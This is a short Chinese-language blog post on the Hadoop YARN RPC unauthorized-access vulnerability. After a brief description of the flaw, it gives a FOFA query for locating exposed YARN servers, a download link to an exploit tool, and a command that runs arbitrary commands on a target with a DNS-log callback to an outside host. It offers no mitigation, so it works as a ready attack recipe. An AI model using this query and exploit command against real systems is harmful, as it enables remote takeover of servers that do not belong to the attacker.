首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >Hadoop Yarn RPC 未授权访问漏洞

Hadoop Yarn RPC 未授权访问漏洞

作者头像
用户8478399
发布2022-09-22 19:39:23
发布2022-09-22 19:39:23
1.7K0
举报
文章被收录于专栏:White OWLWhite OWL

漏洞详情:

Apache Hadoop YARN (Yet Another Resource Negotiator)是一种新的 Hadoop 资源管理器,它是一个通用资源管理系统,可为上层应用提供统一的资源管理和调度,它的引入为集群在利用率、资源统一管理和数据共享等方面带来了巨大好处。 HadoopYarn默认对外开放RPC服务,攻击者可利用RPC服务执行任意命令,进而控制服务器。同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST API不一样,因此即使在 REST API有授权认证的情况下,RPC服务所在端口仍然可以未授权访问。

影响版本:

全版本

FOFA语句:

代码语言:javascript
复制
app="APACHE-hadoop-YARN"

工具下载:

代码语言:javascript
复制
https://github.com/cckuailong/YarnRpcRCE

工具使用:

代码语言:javascript
复制
java -jar YarnRpcUnauth.jar ip:port "ping dnslog"
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-11-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 White OWL 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞详情:
  • 影响版本:
  • FOFA语句:
  • 工具下载:
  • 工具使用:
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档